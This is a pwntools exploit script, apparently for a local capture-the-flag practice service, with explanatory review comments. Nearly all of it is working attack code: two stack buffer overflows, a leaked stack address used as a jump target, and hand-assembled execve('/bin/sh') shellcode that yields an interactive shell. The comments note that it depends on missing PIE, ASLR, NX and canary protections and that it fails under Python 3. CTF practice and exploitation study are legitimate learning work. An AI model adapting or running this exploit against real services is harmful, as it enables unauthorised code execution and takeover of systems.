| from pwn import *
# Target is a 64-bit Linux service: this fixes the assembler (asm()) and
# the packing width (p64()) used by the rest of the script.
context(os='linux', arch='amd64')
def exp(IP, PORT):
    """Proof-of-concept for the CTF practice service at IP:PORT.

    The interaction documents a classic stack-based buffer overflow chain in the
    target: menu option 3 accepts an over-long answer to 'What?', option 2 prints
    a stack address, and a second over-long answer redirects execution to code
    placed in that same stack buffer. Returns the live pwntools tube so the caller
    can drive the resulting session (see __main__).

    NOTE(review): str and bytes are concatenated freely throughout ('a'*0x28 +
    p64(...)); this is the Python 2-era pwntools idiom and raises TypeError under
    Python 3 pwntools.
    """
    p = remote(IP, PORT)
    # First overflow: 0x28 filler bytes, then an 8-byte value (0x12345678 --
    # presumably a value the service compares against; confirm against the
    # binary), 4 bytes of padding, and a return address in the binary's text
    # segment. 0x400809 is a fixed, non-PIE address; PIE would have made this
    # hard-coded value unusable.
    p.sendlineafter('Enter your choice:\n', '3')
    payload1 = 'a'*0x28 + p64(0x12345678) + 'qqqq' + p64(0x400809)
    p.sendafter('What?', payload1)
    # Option 2 echoes a stack pointer as 12 hex digits after 'It is magic: [0x'.
    # A service that prints stack addresses gives away the protection stack
    # ASLR would otherwise provide; this leak is reused as the jump target below.
    p.sendlineafter('Enter your choice:\n', '2')
    p.recvuntil('It is magic: [0x')
    stack = int(p.recvn(12), 16)
    shellcode_addr = stack
    # Machine code for execve("/bin/sh", NULL, NULL): 0x6e69622f / 0x0068732f are
    # "/bin" and "/sh\0" in little-endian, written at [rsp]; rdi then points at the
    # string, rsi/rdx are zeroed, rax is set to syscall number 59 and the syscall
    # is issued. The `xor rax, rax` before `mov rax, 59` is redundant. Executing
    # this from the stack requires a non-executable-stack (NX) protection to be
    # absent on the target.
    shellcode = ""
    shellcode += asm('mov dword ptr [rsp], 0x6e69622f')
    shellcode += asm('mov dword ptr [rsp+4], 0x0068732f')
    shellcode += asm('mov rdi, rsp')
    shellcode += asm('xor rsi, rsi')
    shellcode += asm('xor rdx, rdx')
    shellcode += asm('xor rax, rax')
    shellcode += asm('mov rax, 59')
    shellcode += asm('syscall')
    # Second overflow: the code padded with NUL bytes to 0x38 bytes, followed by
    # the leaked stack address in the saved-return-address slot, so the function
    # returns into its own input buffer. A stack canary would have detected this
    # overwrite before the return.
    payload2 = shellcode.ljust(0x38, '\0') + p64(shellcode_addr)
    p.sendlineafter('Enter your choice:\n', '3')
    p.sendafter('What?', payload2)
    # A non-menu choice ('a') appears to make the vulnerable routine return;
    # confirm against the binary.
    p.sendlineafter('Enter your choice:\n', 'a')
    return p


if __name__ == '__main__':
    # Local practice target only; hand the tube to the operator once connected.
    p = exp('127.0.0.1', 9527)
    p.interactive()